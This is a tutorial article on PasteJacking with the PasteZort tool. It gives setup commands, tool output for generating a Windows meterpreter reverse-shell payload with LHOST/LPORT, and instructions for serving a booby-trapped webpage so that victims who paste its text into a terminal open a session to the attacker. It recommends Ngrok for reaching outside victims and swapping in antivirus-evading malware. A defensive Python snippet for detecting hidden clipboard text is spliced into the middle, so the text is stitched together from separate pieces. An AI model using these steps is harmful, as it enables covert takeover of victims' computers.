Auto-Download & Auto-Execute Payload on Windows/Linux PC


Creating a meterpreter payload is easy and fully under your control, but executing it on the target system is not in your hands.

You have to wait until the victim downloads and clicks on the payload to open a meterpreter session.

This problem is completely solved by the PasteJacking method. With this method, malicious code, commands or payloads can be downloaded and run automatically.

What is PasteJacking?

PasteJacking is a popular method where one can inject malicious hidden code into a webpage. When a user copies any text from the webpage and pastes it into a terminal, the malicious code is executed silently in the background without notifying the user. It is also known as a clipboard poisoning attack.

How is PasteJacking done?

Here we are going to use a very powerful tool called PasteZort. Download it from here. After downloading, install and configure it. To do that, simply follow these commands.
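From the defender's side, the hidden-text trick described above can be caught by comparing what a page displays with what a selection would also copy. This is an added example, not part of the original article or of PasteZort; the inline-style heuristics, the `audit` function and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
import re

# Inline styles that take text out of view but leave it selectable.
# Assumed heuristics: off-screen offsets, zero font size, zero opacity.
HIDING = re.compile(
    r"(?<![-\w])(?:(?:left|top|text-indent)\s*:\s*-\d+"
    r"|(?:font-size|opacity)\s*:\s*0(?:\.0+)?[a-z%]*\s*(?:;|$))", re.I)
VOID = {"br", "img", "input", "hr", "meta", "link", "wbr"}

class CopyAudit(HTMLParser):
    """Separates text a reader sees from text a selection also copies."""
    def __init__(self):
        super().__init__()
        self.stack = []                      # True per open element that hides content
        self.visible, self.hidden = [], []

    def handle_starttag(self, tag, attrs):
        if tag not in VOID:
            style = dict(attrs).get("style") or ""
            self.stack.append(bool(HIDING.search(style)))

    def handle_endtag(self, tag):
        if tag not in VOID and self.stack:   # assumes reasonably well-nested markup
            self.stack.pop()

    def handle_data(self, data):
        (self.hidden if any(self.stack) else self.visible).append(data)

def audit(html):
    """Return the visible text, the concealed text, and whether it would auto-run."""
    parser = CopyAudit()
    parser.feed(html)
    parser.close()
    hidden = "".join(parser.hidden)
    return {
        "visible": " ".join("".join(parser.visible).split()),
        "hidden": hidden.strip(),
        # A line break inside concealed text makes a terminal execute it on paste.
        "auto_runs": bool(hidden.strip()) and bool(re.search(r"[\r\n]", hidden)),
    }

# Constructed sample: a harmless placeholder command inside an off-screen span.
SAMPLE = ('<p>copy ----<span style="position:absolute; left:-100px; top:-100px">'
          '\necho EXAMPLE-HIDDEN-COMMAND\n</span> the code</p>')

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A non-empty `hidden` field means the clipboard will hold more than the reader saw; pasting into a text editor first, or using a shell with bracketed paste enabled, keeps such text from running unreviewed.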

cd PasteZort
chmod +x *
sudo python PasteZ0rt.py
  • The last command should launch the tool.
_________________________________________________________________
| --------------------------------------------------------------- |
||            ____           _       _____          _            ||
||           |  _ \ __ _ ___| |_ ___|__  /___  _ __| |_          ||
||           | |_) / _` / __| __/ _ \ / // _ \| '__| __|         ||
||           |  __/ (_| \__ \ ||  __// /| (_) | |  | |_          ||
||           |_|   \__,_|___/\__\___/____\___/|_|   \__|         ||
||                           -----------                         ||
||                           |v| |0|.|1|                         ||
||                           -----------                         ||
||           ______    _   _        _    _            _          ||
||          |___  /   | | | |      | |  | |          | |         ||
||             / / ___| |_| |_ __ _| |__| | __ _  ___| | __      ||
||            / / / _ \ __| __/ _` |  __  |/ _` |/ __| |/ /      ||
||           / /_|  __/ |_| || (_| | |  | | (_| | (__|   <       ||
||          /_____\___|\__|\__\__,_|_|  |_|\__,_|\___|_|\_\      ||
||                                                               ||
| --------------------------------------------------------------- |
|_________________________________________________________________|

-------------------------------------------------------------------
 -> Iniciando servidor Apache:
-------------------------------------------------------------------

 -> ¡Apache Listo!
-------------------------------------------------------------------
                                                                                                     
   Sistema operativo objetivo:

   [1] Windows
   [2] Linux
   [3] Mac OSX

   Objetivo: 1

-------------------------------------------------------------------                                  
 -> Configuracion de Payload:                                                                        
-------------------------------------------------------------------                                  
                                                                                                     
   Seleccione Payload:

   [1] windows/meterpreter/reverse_tcp
   [2] windows/meterpreter/reverse_http
   [3] windows/meterpreter/reverse_https
   [4] windows/shell/reverse_tcp

   Payload: 1
  • After selecting the payload, hit Enter and set the LHOST and the LPORT.
   LHOST= 192.168.113.128
   LPORT= 4444

-------------------------------------------------------------------                                  
 -> Generando payload...                                                                             
-------------------------------------------------------------------                                  
                                                                                                     
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 296 bytes


-------------------------------------------------------------------                                  
 -> ¡Payload Generado!                                                                               
-------------------------------------------------------------------    
  • This will generate a payload for Windows. In the next step, set the text you want the webpage to show for copying.
  Mensaje 1: copy ----
   Mensaje 2: the code

-------------------------------------------------------------------                                  
 -> Payload, mensajes y comandos injectados en index.html                                            
-------------------------------------------------------------------                                  
 -> Archivo index.html copiado en servidor local  
 -> URL maliciosa: http://192.168.113.128/   
  • Now it will ask you if you want to start the listener. Just say ‘y’ for yes.
                                                                                                     
   ¿Desea iniciar el handler? (y/n): y

-------------------------------------------------------------------                                  
 -> Iniciando handler Metasploit...   
  • When the target visits the served webpage (in our case it is http://192.168.113.128), copies the “copy ---- the code” text and pastes it into CMD, the hidden command will be executed and a meterpreter session will be opened.
  • Session 1 has been opened. To interact with the session, type ‘session 1’ in the terminal. Now you have complete access to the machine.
PasteJacking using PasteZort

Things you can change

  • If you have a good knowledge of HTML, you can modify the malicious webpage and add more design to it. The tool automatically transfers the generated webpage to the var/www/html directory. There you will find the ‘index.html’ file.
  • If you want to share the webpage outside the network, you can use the Ngrok port forwarding service, which is free.
  • By default, the tool generates a meterpreter payload, which is detectable by any antivirus. You can replace the payload with an undetectable virus. It is up to you.

Conclusion

PasteJacking is a very effective method if you implement it properly. It needs your creativity. Nobody is going to copy something that looks malicious and useless.

You have to be tricky. We always say “tools are just to make your work easier, not to do your work”. It’s you who has to get the work done.

What’s your opinion about PasteJacking? Did you find it useful?